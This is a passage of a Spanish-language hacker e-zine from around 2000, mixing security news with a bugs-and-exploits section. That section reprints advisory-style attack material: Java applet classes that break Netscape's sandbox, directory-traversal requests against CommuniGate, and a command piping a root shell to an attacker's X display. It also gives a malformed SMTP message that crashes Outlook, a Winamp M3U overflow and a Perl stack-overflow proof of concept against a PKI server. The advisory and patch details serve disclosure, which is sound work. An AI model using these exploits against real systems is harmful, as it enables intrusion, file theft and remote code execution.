|============================|=========|
| EL DERVY ENTRE LOS HACKERS | EleKtr0 |
|============================|=========|
Bueno esta noticia la recuerdo haber leido por ahy y trata de lo sgt:
Un grupo de hackers llamados HFG habria hackeado hace ya algun tiempo alrrededor
de 300 dominios entre ellos se ecnontraban algunos famosos, en todas las pajinas
hackeadas dejaron un msg ridiculisando a otros grupos y en concreto unos de los
otros, llamados "LoU" batio todos los records conosidos hasta el momento en
cuanto al webhack (nueva palabra :)se tratase, si estas sentado entonces apoyate
y respira profundo, por que el grupo LoU hackearon mas de 24.000 dominios.......
simplemente impresionante! en todas las pajinas dejaban un msg tmb en respuesta
al grupo HFG ademas k apoyaban la libertad de Kevin
La fuente de la noticia es totalmente fidedigna,
|=======================================================|==================|
| Microsoft publica el Service Pack 1 para Windows 2000 | www.hispasec.com |
|=======================================================|==================|
Microsoft ha publicado la primera actualizacion oficial para la familia de
sistemas operativos Windows 2000. El Service Pack 1 para Windows 2000 ya esta
disponible y Microsoft recomienda su instalacion a todos los usuarios del nuevo
sistema operativo
Este primer Service Pack contiene un gran numero de parches que se engloban en
apartados de confiabilidad, compatibilidad, configuracion y seguridad.En general
cubre aspectos como el Sistema Operativo base, el Servicio de Directorio, IIS y
COM+, correo,administracion,MDAC(acceso a datos), MSMQ, red,impresion,seguridad,
configuracion y shell
Microsoft no ha incluido nuevas caracteristicas en este SP1, tan solo ofrece
mejoras de calidad o rendimiento,solo soluciona los problemas reportados por los
usuarios durante los primeros meses de implantacion de este sistema operativo
Entre las actualizaciones de seguridad cubiertas se cuentan la ejecucion de
codigo en archivos de ayuda en html, las vulnerabilidades asociadas a archivos
.htr, la vulnerabilidad en las cabeceras de e-mails falseadas,en la reagrupacion
de paquetes IP fragmentados, etc
Microsoft ofrece dos formas de instalacion de este Service Pack, la instalacion
rapida y la instalacion de red. La primera detecta los componentes del sistema e
instala solo aquellos componentes necesarios para el sistema, la segunda instala
el SP1 completo en la maquina. La primera consiste en aproximadamente unos 14
Mbytes mientras que la segunda son 87 Megas
|============================================|================|
| S e g u r i d a d e n C o m p u t o 2000 |www.bugtraq.com |
|============================================|================|
Noviembre 26 - Diciembre 1 del 2000
Palacio de Miner'ia, Ciudad de M'exico
Los eventos "Seguridad en C'omputo 2000" (http://www.seguridad2000.unam.mx) y el
"D'ia Internacional de Seguridad en C'omputo 2000(DISC2000)"www.disc2000.unam.mx
tienen como objetivo concientizar a la comunidad usuaria de c'omputo sobre las
medidas de seguridad necesarias para proteger la informaci'on en cualquiera de
sus formas
Seguridad en C'omputo ser'a un punto de encuentro para todos aquellos
involucrados en el uso de equipo de c'omputo. DISC es una celebraci'on mundial
convocada por la ACM (Association For Computing Machinery)
Desde 1994, M'exico participa de esta celebraci'on a trav'es del 'Area de
Seguridad en C'omputo (ASC) de la UNAM Este an~o, el DISC 2000 se llevar'a a
cabo el 30 de Noviembre, como parte del evento " Seguridad en C'omputo 2000"
Por este medio se convoca a la comunidad a participar en el evento "Seguridad en
C'omputo 2000" a trav'es de la presentaci'on de documentos teoricos
teorico-pr'acticos, de aplicaci'on en los siguientes temas:
>> Comercio electr'onico
Certificaci'on
Dinero electr'onico
Nuevos protocolos
Esquemas actuales
Nuevas tecnolog'ias
Transaccines seguras
Estado actual en M'exico
>> Nuevas tecnolog'ias de firewalls
Fw h'ibridos
Nueva generaci'on de FW
>> Seguridad en Web
Esquemas seguros
Secure Sockets Layer (SSL)
>> Seguridad en Redes
Seguridad en ruteadores
Nuevas tecnolog'ias de redes
>> Legislaci'on sobre seguridad en c'omputo.
Propuestas de legislaci'on.
Avances en materia de legislaci'on 1999-2000.
Regulaci'on de nombres de dominio.
Propiedad intelectual y derechos de autor.
Propiedad industrial.
>> Seguridad en Clusters
>> Seguridad para desarrollo de software.
>> Seguridad en sistemas distribuidos y bases de datos.
>> Seguridad en agentes y lenguajes multiplataformas.
>> Equipos de respuesta a incidentes.
>> Manejo, prevencin y coordinacin de incidentes de seguridad en c'omputo.
>> Cuestiones legales y administrativas en el manejo de incidentes.
>> Herramientas para el manejo de incidentes.
>> Ataques inform'aticos.
>> Privacidad y protocolos criptogr'aficos.
>> Pol'iticas de seguridad.
>> Virus inform'aticos.
>> Ataques DDOS
Categor'ias de participaci'on
=============================
Los d'ias 26, 27 y 28 de Noviembre estar'an destinados a la presentaci'on de
talleres, tutoriales y sesiones informales.Durante los d'ias 29, 30 de Noviembre
y 1 de Diciembre se efectuar'an las conferencias
El d'ia 30 de Noviembre se celebrar'a el " D'ia Internacional de Seguridad en
C'omputo" DISC 2000 cuyo programa de actividades se publicar posteriormente
Los idiomas oficiales para este an~o son espan~ol e Ingles
Categor'ias de participaci'on
=============================
1.- Tutoriales y Talleres.
Medio d'ia (4 hrs.)
D'ia completo (8 hrs.)
2.- Conferencias (30 mins.)
3.- Conferencias magistrales (1 hr.)
4.- Sesiones informales (60 o 90 mins.)
Nota: Las sesiones informales son paneles sobre temas de interes que podr'an ser
dirigidos por una o mas personas.
Comit'e Cient'ifico
===================
Los trabajos se someter'an a un comit'e cientfico para su evaluaci'on y selecci'on
El comit'e est'a integrado por investigadores y profesionistas reconocidos en el
campo de la seguridad en c'omputo a nivel mundial.
>> Dr. Eugene Spafford
Director of CERIAS, Purdue University, EU
>> Wietse Venema
IBM T.J. Watson Research Center
>> Dr. Eugene Schultz
Global Integrity, EU
>> Linda McCarthy
Net-Defense, EU
>> M. en C. Diego Zamboni.
CERIAS, Universidad de Purdue, E.U.A.
>> Juan Carlos Guel L'opez
'Area de Seguridad en C'omputo, DGSCA-UNAM, Mexico
Para mayores informes
=====================
e-mail: comite@seguridad.unam.mx
http://www.seguridad20000.unam.mx
http://www.disc2000.unam.mx
http://www.asc.unam.mx
|====================================|=========|
| EL ESCANEO DE PUERTOS NO ES ILEGAL | EleKtr0 |
|====================================|=========|
O esque pensabas k escanear puertos es legal??? nhaaa es ilegal! no en chile pero
es ilegal! por ejemplo en Espa¤a, EEUU por nombrar algunos, bueno la notici esque
un juez de Noruega dictamino que el escanear puertos no es ilegal ni mucho menos
lo es provar la seguridad de algun servidor privado, desicion que apoyo diciendo
que cuando uno se mete en lo que es Ineternet ya sea como empresa o de forma
independiente se toman de forma inmediata las medidas que esto rekiere,vale decir
un servidor web seguro y que el intento de penetraciones (?) es algo ya normal
de la RED
baya! juez, estoy mas k seguro que chileno no es! tampoco Espa¤ol XD, EEUU?¿
|===================|=======================|
| Bug en Winamp | www.securityfocus.com |
|===================|=======================|
Existe una vulnerabilidad de desbordamiento de bufer en Winamp, el conocido
programa reproductor de musica en formato mp3. Esta fallo de seguridad puede
llegar a causar la ejecucion de codigo malicioso en el ordenador atacado. Winamp
dispone del tipo de archivos M3U, que permiten facilitar la tarea de creacion de
listas de reproduccion, de forma que pueden clasificarse temas para reproducir
segun su autor, disco o tematica. Sin embargo, el analizador de este formato de
ficheros de Winamp no realiza una correcta comprobacion de los parametros que en
el se adjuntan, por lo que un atacante puede provocar un desbordamiento de bufer
que puede ser aprovechado para la inclusion (y ejecucion) de codigo malicioso.El
desbordamiento se produce cuando se trata el parametro "#EXTINF:", bastara
introducir una cadena de mas de 280 caracteres tras dicha opcion para provocar
el error. Un ejemplo de archivo malicioso quedaria asi:#EXTM3U #EXTINF:AAAAAA...
(cadena de 280 caracteres) ....AAAAAAAAAAAAAAAAAAA El ataque puede realizarse de
multiples maneras, como mediante la inclusion del archivo malicioso en una
recopilacion de musica,o incluso en una pagina web:
<a href="ataque.m3u">
<bgsound src="ataque.m3u">
<embed src="ataque.m3u">
Mas informacion: Securityfocus: www.securityfocus.com/vdb/bottom.html
|=================|=====================|
| "Web-Troyano" | www.brumleve.com |
|=================|=====================|
Nuevos agujeros de seguridad permiten compartir los ficheros y directorios
locales de los sistemas de los usuarios con tan solo visitar una pagina web con
el navegador de Netscape. Un applet de Java dise¤ado para la ocasion consigue
eludir las restricciones de la "sandbox" de Netscape y abrir un puerto que
convierte el disco duro del visitante/victima en un servidor web accesible por
cualquiera. Dam Brumleve, un joven "hacker" de 22 a¤os, ha desarrollado "Brown
Orifice HTTPD", un applet que convierte al navegador de Netscape en un troyano-
backdoor.La funcion de "BOHTTPD" consiste en abrir un servidor web en el sistema
del usuario y compartir su disco duro, de forma que cualquiera puede acceder a
sus ficheros locales desde Internet con un simple navegador. Para construir el
applet, "BOHTTPD",aprovecha en primer lugar una vulnerabilidad que permite abrir
un servidor Java accesible de forma remota por un cliente arbitrario. Esta
vulnerabilidad es explotada en BOServerSocket.java y BOSocket.java:
[BOServerSocket.java]
import java.io.IOException;
import java.lang.SecurityException;
import java.net.Socket;
import java.net.ServerSocket;
public class BOServerSocket extends ServerSocket {
public BOServerSocket(int port) throws IOException {
super(port);
}
public BOSocket accept_any() throws IOException {
BOSocket s = new BOSocket();
try { implAccept(s); } catch (SecurityException se) { }
return s;
}
}
[BOSocket.java]
import java.net.Socket;
import java.io.IOException;
public class BOSocket extends Socket {
public void close_real() throws IOException {
super.close();
}
public void close() {
}
}
En segundo lugar, aprovecha otra vulnerabilidad que permite acceder a cualquier
URL desde el applet cliente, incluyendo los ficheros locales, de forma que
facilita compartir el disco duro del usuario.Esta vulnerabilidad es explotada en
BOURLConnection.java y BOURLInputStream.java:
[BOURLConnection.java ]
import java.net.MalformedURLException;
import java.net.URL;
import netscape.net.URLConnection;
public class BOURLConnection extends URLConnection {
public BOURLConnection(String u) throws MalformedURLException {
super(new URL(u));
connected = true;
}
public BOURLConnection(URL u) {
super(u);
connected = true; }
}
[BOURLInputStream.java]
import java.net.URL;
import java.io.IOException;
import netscape.net.URLInputStream;
import netscape.net.URLConnection;
public class BOURLInputStream extends URLInputStream {
public BOURLInputStream(URLConnection uc) throws IOException {
super(uc);
open();
}
}
Brumleve mantiene una pagina donde demuestra en la practica como funciona "Brown
Orifice",en la cual podemos indicar el directorio local que queremos compartir y
el puerto en el que escuchara nuestro servidor web. La demostracion tambien
recoge en una pagina web el listado de todos los sistemas que estan probando el
applet,lo que algunos ya estan aprovechando para compartir MP3s y otros recursos
Para cerrar el servidor web basta con cerrar la sesion de Netscape que
mantenemos abierta con el applet. Segun una ultima nota del autor, ha podido
comprobar como un sistema Windows 2000 ha continuado ejecutando "BOHTTPD" aun
despues de haber cerrado el navegador, aunque de momento seria un hecho aislado
del que no se conocen mas detalles. Netscape no ha facilitado aun parche para
corregir estas vulnerabilidades,por lo que la unica solucion pasa por desactivar
el soporte de Java en sus navegadores.
Mas informacion: Brown Orifice: www.brumleve.com/BrownOrifice
|====================================|=========|
| Reclutamiento de Hackers | EleKtr0 |
|====================================|=========|
Ya es sabido,que muchos gobiernos estancontratando los servicios de hackers para
resguardar la seguridad informatica nacional y poder seguir encubriendonos lo k
es nuestro, bueno ahora se hiso esto oficial, ya que en Quebec estan reclutando
hackers,para provar la seguridad de los ordenadores del gobierno de dicha ciudad
Han montado unos laboratorios a base de ordenadores de 400 Mhz por que segun
dicen,"es lo que todos tienen..."Ademas de provar la seguridad de los computines
del los estafadores, tedran que comprovar la seguridad de los sistemas de
informacion compartida, osea los consultorios, hospitales, policias,oficinas,etc
como si todo esto fuera poco tmb tendran que aprovar la compra de material para
las comunicaciones, osea tendran que decir si un fax es o no seguro, telefonos,
celulares, todo! uff impresionante...
|==================|================|
| Bug BitchX | www.bitchx.org |
|==================|================|
Desbordamiento de bufer en BitchX
BitchX es vulnerable a un ataque de desbordamiento de bufer que permite la
ejecucion de codigo arbitrario en la maquina del usuario,con los privilegios del
usuario que haya invocado el programa. BitchX es un cliente de IRC muy popular
en el mundo Unix,especialmente en los entornos Linux. Las versiones recientes de
BitchX son vulnerables a varios ataques de desbordamiento de bufer, en concreto
bajo el comando "invite". El problema se manifiesta cuando un atacante invita a
la victima a un canal con comandos de formato en su nombre. En el mejor de los
casos, el ataque provoca la caida de la conexion IRC del usuario, y en el peor
puede permitir la ejecucion de codigo arbitrario en la maquina de la victima.
Los usuarios que utilicen BitchX deben actualizar su version enseguida, o bien
aplicar los parches correspondientes. Los parches solo corrigen el problema mas
grave (el comando "invite"), pero la version actual del programa soluciona
numerosos problemas potenciales tambien.
Mas informacion: BitchX: www.bitchx.org
Autor : EleKtr0
Titulo : UnderNews
Linkz : Agradecimientos a:
www.hispasec.com
¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
13
`°¤ø,¸,ø¤°
Autor : Lectores
Titulo : ZZZZzzzzzzZZZZZzzzzZZZZZzzzz!
Comentario: No duermas mas y atrevete a mandarme tu articulo, que no te preocupe
el nivel del contenido solo haslo! y participa en esta nueva aventura, tambien y
de paso dare el aviso de alguien que se quiera encargar de la seccion noticias o
tmb la creacion de la pajina web, o en la creacion de logotipos, recuerda que
soy yo solo, y ahora estoy sudando la gota gorda...
- EleKtr0@usa.net
- zok_electron@usa.net
- www.electron-team.subnet.dk
Contenido : Aqui debiera ir tu sabiduria... y esfuerzo!
Alo! alo! provando!, si! si!, 1,2,3 provando!... tuuuuuuuuuuuuuuuuuu
¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
14
`°¤ø,¸,ø¤°
Autor : EleKtr0
Titulo : Criticas!
Correo : electron_team@usa.net
URL : www.electron-team.subnet.dk
Comentario: Inovacion, es lo que se necesita y bueno aqui estamos intentando
inovar, en esta seccion pretendo dar un espacio de libre opinion a quienes
tengan algo que decir, contar o symplemente criticar, preferenciando sobre las
demas la critica,siempre k esta sea una critica positiva, no destructiva a menos
que esta critica destrucitva plantee de forma clara las posibles soluciones que
el caso requiera...
El espacio Under_Filosofico se construira principalmente de sus pensaminetos
asik no esperes mas y manda de una ves eso que tanto quieres decir, expresate!
liberate!, revelate! haslo! ya! aqui esta la oportunidad k estubistes esperando
por largo tiempo aprovechala hasla tuya!, por otro lado tambien hago valida la
invitacion a la gente de afuera, asik ya saben¡
Y como yo tampoco quiero perderme este lindo espacio comensare con la primera de
este e-zine,haa! por cierto,no teman a ser paranoicos, locura! es la receta para
que este espacio sea entretenido y tenga buena aseptacion...
__________________________________________________________ELECTRON SECURITY TEAM
Cualquier opinion,critica,comentario,pensamineto, reflexion etc, es de exclusiva
responsabilidad del autor, y no representara en ningun caso el pensamiento y la
responsabilidad del ELECTRON SECURITY TEAM, amenos k sea se¤alado durante el txt
ELECTRON SECURITY TEAM__________________________________________________________
Contenido : Hoy en dia donde la rutina es reina y ama de la "vida" diaria, donde
ya no se alcanza a percibir lo real de lo ficticio, donde ya dudamos hasta de lo
natural, en donde la vida no es mas que el trayecto de la casa al trabajo y del
trabajo a la casa, donde domina el poder del dinero y la anarquia social de los
revolucionarios imponiendo sus propias leyes, donde el gobierno adopta posturas
futuristas, aceptando leyes consumistas y dandoselas de nacion desarrollada
, imponiendo una imagen internacional, haci es! imponiendo! una faceta llena de
burdos y asquerosos sub-desarrollos, cuando la realidad que mastican es otra muy
distinta,,,y esque tienen a su gente muriendose de hambre, obligandolos a tragar
las migajas que a ellos les sobran, migajas que de porsi tienen un mal sabor, un
sabor a fraude, enga¤o, burla, un sabor que seria mucho mas aceptable si fuese a
nada, pero de forma obligada y sin preguntarle a nadien la vida sigue su rumbo y
conjunta y ciegamente todos la siguen ¡TODOS!,sin detenerse jamas y cuestionarse
el por que estan caminando y mas aun,donde conduce este camino tan ireal como la
la misma realidad?, que fin tendra? son unos blasfemicos tan absurdos,tan sucios
tan insensatos, donde muchos creen en la libertad, cuando realmente nadien les
pregunto si acaso estaban dispuesto a haceptar esta loca sociedad y caminar
con ella, solo se dejaron colocar la venda sobre sus ojos pensando que esta los
protegeria, cuando no hizo mas que esconder lo injusto que es lo justo!... Todos
preocupados por la libertad! ja! que basura... la libertad es una mentira, y aun
asi hay gente que cree en ella,cuando creen que la verdadera, es un deber humano
y no un derecho a ser ejercido dignamente,o como cuando dicen que la libertad es
decir lo k uno kiera a quien quiera,sin detenerse a pensar un solo minuto de sus
absurdas vidas,por el respeto humano por que al fin de cuentas somo HUMANOS y
mientras lo seamos seremos seres imperfetos dispuestos a tragar cualquier tipo
de mentira disfrasada de verdad,...
Autor : EleKtr0
Titulo : Criticas!
Correo : electron_team@usa.net
URL : www.electron-team.subnet.dk
¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
15
`°¤ø,¸,ø¤°
Autor : EleKtr0
Titulo : Bug`s & Exploit`s
Contenido :
#####################################################
# Sistema Operativo # Windos 2000, NT # Descripcion :Durante el proceso de inicio
########################################### de sesion de un usuario en WinNT y 2000
# Vulnerabilidad # Relative Shell Path # se ejecuta la aplicacion Explorer.exe que
########################################### se encuentra en el directorio Windows.
# Fuente del Bug # www.hispasec.com # Debido a un error de Microsoft al no
########################################### especificar la trayectoria absoluta de
este fichero, es posible situar un troyano con el mismo nombre en el raiz que se
ejecutara con los privilegios del usuario que inicie la sesion Cada vez que un
usuario inicia la sesion, Windows NT y 2000 leenla entrada del registro:
HLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
para conocer el fichero que deben ejecutar como Shell, por defecto "Explorer.exe",
sin indicar la trayectoria absoluta
Cuando en Windows no se especifica la trayectoria de un fichero inicia una busqueda
en el siguiente orden:
1. Busca en el directorio actual
2. Si el fichero no ha sido localizado, busca en los directorios especificados en:
HLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path
3. Si tampoco es localizado, busca en los directorios especificados en:
HKEY_CURRENT_USER\Environment\Path
Esto quiere decir que,durante el inicio de sesion,en primer lugar intenta localizar
a "Explorer.exe" en el raiz (ejem: C:\), a continuacion en el directorio de sistema
(ejem: C:\WINNT\System32), y por ultimo en la carpeta de Windows (ejem: C:\WINNT),
donde se encuentra el fichero
Por defecto todos los usuarios del sistema tienen permisos de escritura sobre el
directorio raiz, lo que facilita que un atacante local pueda situar un troyano
renombrado como "Explorer.exe" en el raiz,que se ejecutaria cada vez que un usuario
inicie la sesion con sus privilegios de seguridad
Microsoft argumenta que no especifica una trayectoria absoluta porque podria causar
problemas de compatibilidad con software comercial, que interrogan tambien el
registro de Windows para conocer el nombre del Shell, no estan preparados para leer
una trayectoria completa Es por esta razon que no es posible, al menos recomendable
corregir la vulnerabilidad mediante la inclusion de la trayectoria absoluta en la
entrada del registro Para solucionar el problema Microsoft ha modificado el codigo
de Inicio de sesion para que anteponga la trayectoria adecuada antes del nombre del
fichero
Los parches para corregir esta vulnerabilidad, segun plataforma, puede ser
descargados de las siguientes direcciones:
Microsoft Windows NT 4.0 Workstation, Windows NT 4.0 Server,y Windows NT 4.0 Server
Enterprise Edition:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23360
Microsoft Windows 2000 Professional, Server, y Advanced Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23359
Microsoft Windows NT 4.0 Server, Terminal Server Edition:
No disponibles aun.
###############################################
# Sistema Operativo # Linux # Descripcion : CommuniGate nos ofrece una
############################################ URL para acceder directamente a la guia
# Vulnerabilidad # CommuniGate Pro 3.2.4# web del usuario, mapeado /Guide/ a un
############################################ subdirectorio del directorio donde hemos
# Fuente del Bug # www.bugtraq.com # instalado el programa. El servidor web
############################################ que incorpora el progama sufre del
ampliamente conocido problema de las peticiones "../..". Si hacemos una peticion al
mapeo /Guide/ del servidor web de gestion usando la tecnica de "../..", obtenemos:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../../../../../etc/motd HTTP/1.0
HTTP/1.0 200 OK
[... el contenido del fichero /etc/motd]
Connection closed by foreign host.
homer:~$
Dado que CommuniGate se ejecuta como superusuario y no libera sus privilegios,podemos
acceder a cualquier fichero del sistema, por ejemplo /etc/shadow...
Podriamos pues, recuperar el fichero de configuracion de la cuenta de administrador/
postmaster, que contiene el fichero en texto plano del servidor web de gestion:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET
/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.
macnt/account.settings HTTP/1.0
HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT
{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$
2. Ejecucion remota (como root) de comandos arbitrarios
Esto no constituye una vulnerabilidad por si mismo, sino que es una demostracion de
hasta donde puede llegar un atacante que se haga con la contrase¤a del administrador
Mirando algunas de las funcionalidades de CommuniGate encontramos la funcion PIPE
Permite a cualquier usuario mandar correo a un programa en el servidor de correo.Por
defecto esta funcionalidad esta deshabilitada,aunque dado que poseemos la contrase¤a
de gestion, podemos activarla, configurar el directorio de aplicaciones como
/usr/X11R6/bin, incrementar el tiempo maximo de ejecucion de un proceso y mandar un
correo a "xterm -display 172.16.2.4:0.0 -e /bin/sh"@pipe con lo que se nos abrira
una xterm como root en el escritorio...
Versiones y plataformas afectadas
---------------------------------
Esta vulnerabilidad ha sido comprobada en la distribucion Linux de la version 3.2.4
(la ultima version estable) que se encuentra en www.stalker.com. No se ha comprobado
en ninguna otra de las plataformas,ni con ninguna version previa, aunque creemos que
el fallo no es especifico a esta plataforma ni version en concreto.
Las versiones beta (a partir de la v3.3b2) no estan afectadas por este problema.
Solucion
--------
En breve estara disponible la siguiente version estable (v3.3) que solucionara este
problema. Mientras tanto, las versiones beta a partir de la v3.3b2 ya tienen este
problema solucionado.
Las actualizaciones estan disponibles en la web del fabricante,
http://www.stalker.com
##################################
# Sistema Operativo # Windos 9x,NT,2000 # Descripcion:Una importante vulnerabilidad
############################################ en Outlook y Outlook Express permite el
# Vulnerabilidad # Outlook Expres # envio de un mensaje, que causa la
############################################ ejecucion de codigo arbitrario durante su
# Fuente del Bug # www.hispasec.com # recuperacion en dichos clientes de correo
############################################ Microsoft ha facilitado un parche que
recomienda instalar a todos los usuarios afectados.
La vulnerabilidad se encuentra en Inetcomm.dll, un componente compartido por los
clientes de correo Oulook y Outlook Express. Esta libreria contiene un bufer que puede
ser desbordado al recibir un correo electronico via POP3 o IMAP4, sin necesidad de que
el destinatario abra o previsualice el mensaje. Explotar esta vulnerabilidad puede
provocar un error y el reinicio de la aplicacion o la ejecucion de codigo arbitrario.
Para llevar a cabo el ataque basta conectar a un servidor SMTP a traves de telnet y
enviar un mensaje con un argumento excesivamente largo en la seccion GMT del campo
fecha. Por ejemplo:
HELO
MAIL FROM: remitente@servidor.com
RCPT TO: victima@servidor.com
DATA
Date: Thu,13 Jun 2000 12:33:16 +1111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111
.
QUIT
Este mensaje provocara un error y el reinicio de los clientes de correo Outlook y
Outlook Express durante la operacion de descarga desde el servidor de correo al
sistema de la victima. Hay que destacar que no es necesario abrir o previsualizar el
mensaje para que se provoque el desbordamiento de bufer. El correo electronico no
llega a recibirse en el buzon del cliente, ni se borra del servidor de correo, por lo
que el ataque se puede repetir de forma continua cada vez que se intente descargar el
correo, hasta que el administrador borre el mensaje que explota la vulnerabilidad o
que la victima instale el parche correspondiente.
Todas las versiones de Inetcomm.dll se encuentran afectadas,a excepcion de las que se
distribuyen junto con Internet Explorer 5.01 Service Pack 1 y Outlook Express 5.5.
Tambien se encuentran libres del problema los usuarios que tengan configurado en
Outlook el protocolo MAPI para comunicarse con el servidor de correo, como ocurre por
defecto cuando el servidor es Microsoft Exchange. Sin embargo, se recomienda a estos
ultimos la instalacion del parche, ya que corrige otras vulnerabilidades ademas de la
que nos ocupa.
Versiones afectadas:
-Microsoft Outlook Express 4.0
-Microsoft Outlook Express 4.01
-Microsoft Outlook Express 5.0
-Microsoft Outlook Express 5.01
-Microsoft Outlook 97
-Microsoft Outlook 98
-Microsoft Outlook 2000
Los usuarios afectados deben instalar el parche especifico o algunas de las versiones
de Outlook no afectadas.
Parche "Malformed E-mail Header" (disponible de momento solo para IE5.01):
http://www.microsoft.com/windows/ie/download/critical/patch9.htm
Area de descarga y actualizaciones en version Espa¤ol:
http://www.microsoft.com/windows/ie_intl/es/download/
###################################################
# Sistema Operativo # Windos NT # Descripcion: Mientras se investigaba la
############################################ explotabilidad de un buffer overflow en
# Vulnerabilidad # Net Tools PKI Server # el " Net Tools PKI Server de Network
############################################ Associates Inc. "se han descubierto tres
# Fuente del Bug # www.core-sdi.com # nuevas vulnerabilidades no arregladas
############################################ por el hotfix 1,lanzando para solucionar
problemas reportados por Jim Stickley de Garrison Technologies Inc. ( version
<http://www.securityfocus.com/bid/1363 > y <http://www.securityfocus.com/bin/1364>)
Descripcion del Problema
~~~~~~~~~~~~~~~~~~~~~~~~
Problema #1: Buffer overflow en strong.exe
Un buffer overflow en el componente de servidor de web de Net Tools PKI server
permite a un atacante remoto ejecutar codigo arbitrario como SYSTEM en la maquina en
la que lo esta corriendo.
Para determinar si alguien ha intentado explotar esta vulnerabilidad, verifique los
archivos enroll-access.log y admin-access.log en el directorio WebServer/logs de su
instalacion de Net Tools PKI Server. Busque por cualquier entrada de log que sea
excesivamente larga (mas de 500 caracteres). Cada entrada de log puede luego ser
examinada para ver la direccion IP de la computadora que envio el pedido.
Problema #2: Vulnerabilidad de Directory traversal
La instalacion por defecto de Net Tools PKI Server permite a un atacante remoto ver y
bajarse cualquier archivo que resida en el servidor.
Para determinar si alguien ha intentado explotar esta vulnerabilidad, verifique los
archivos enroll-acess.log y admin-access.log en el directorio WebServer/logs de su
instalacion de Net Tools PKI Server. Busque por cualquier entrada de log conteniendo
"..\". Cada entrada de log puede luego ser examinada para ver la direccion IP de la
computadora que envio el pedido.
Problema #3: Strings de Formato con datos suministrados por el usuario
El Net Tools PKI Server falla en validar adecuadamente la informacion pasada como
argumentos a las rutinas de logueo del servidor permitiendo a un atacante remoto
ejecutar codigo arbitrario como SYSTEM en la maquina sobre la que esta corriendo.
Impacto
~~~~~~~
Problema #1: Acceso remoto no autenticado al servidor PKI, ejecucion de comandos
arbitrarios como el usuario corriendo el enrollment server (System)
Problema #2: Acceso remoto no autenticado a cualquier archivo en el servidor PKI
Problema #3: Acceso remoto no autenticado al servidor PKI, ejecucion de comandos
arbitrarios como el usuario corriendo el enrollment server (System)
Detalles Tecnicos
~~~~~~~~~~~~~~~~~
Problema #1: Buffer overflow en strong.exe
Strong.exe es el componente de servidor web del PKI Server,recibe pedidos sobre SSL
en los ports 443/tcp, 444/tcp y 445/tcp (ports por defecto). Mientras que las
conexiones al port 443/tcp requieren que ambos el cliente y el servidor se
autentiquen usando certificados, las conexiones al port 444/tcp no requieren
autenticacion por parte del cliente,por lo tanto cualquier usuario con conectividad
de red hacia el servidor PKI puede conectarse via HTTPS a ese port.
El servicio corriendo en el port 443/tcp es llamado el Administrative Web Server y
por lo tanto es obvio el requerimiento de la autenticacion mutua. El servicio
corriendo en el port 444/tcp es el Enrollment Web Server y por defecto no requiere
un certificado por el lado del cliente. Los dos servidores web son en realidad
servidores virtuales servidos por el strong.exe.
Un buffer overflow existe en la funcion que genera la informacion de log,que permite
sobreescribir el stack usando informacion dada por el usuario pasada al servidor
como un URL en el pedido HTTPS.
https://host:444/<2965 caracteres 'A'>
EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP = 0040977B
El valor en EAX es parte del string (FECHA+PATH+ARCHIVO+RAZON)
que se loguea, detallando la razon del fallo. Dado que no es una direccion valida,se
produce un segmentation fault unas instrucciones despues de haberse sobreescrito el
buffer:
mov ecx,[eax+000000E4]
Lo anterior no sobreescribe el EIP y mata al servidor antes de que sea sobreescrito,
pero una minima variacion de esto permitira al atacante sobreescribir EBP, EIP y
sobreescribiendo cuidadosamente variables locales, controlar la ejecucion de codigo
arbitrario en la maquina atacada.
A continuacion, un perl script de prueba de concepto ejemplifica esto:
------------------------------------------------------------------------ cortar aqui
------------------------------------------------------------------------ cortar aqui
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Exploit de Stack Overflow por URL Largo
# Cambie el host y port y cree el archivo html:
#./pkiluso.pl > test.html
#Abra el html con un navegador compatible con SSL y haga click en el
link. puf!
#Juliano Rizzo (c) 2000 juliano@core-sdi.com
<http://cw014w7.correoweb.com/Scripts/cweb.dll?CWEBPORTAL.328214:SENDMAIL:936751676:
juliano@core-sdi.com>
$host = "localhost";
$port = "444";
$shell_code= "\x90\x90\x90\x90";
#Podemos setear los valores de EIP y EBP, nuestro codigo esta en el
stack
#y en 0x01613A2E.
$eip = "\x2E\x3A\x61\x01";#0x01613A2E (URL leido desde el socket)
#$eip = "\x64\x83\x40%00";#0x00408364 (CALL EBP)
$ebp = "\xCB\xF2\01\x02"; #0x0200F2CB (trunca el string por el 00)
$noplen = (2965 - length($shell_code));
print "<html><body><a href=\"https://".$host.":".$port."/";
print "\x90"x$noplen;
print
$shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01"."\">Haga
click aqui para el exploit.!</a></body></html>";
cortar aqui --------------------------------------------------------------------------
cortar aqui --------------------------------------------------------------------------
Problema #2: Vulnerabilidad de Directory traversal
Especificando '..\' en pedidos HTTPS al enrollment server, un atacante puede navegar
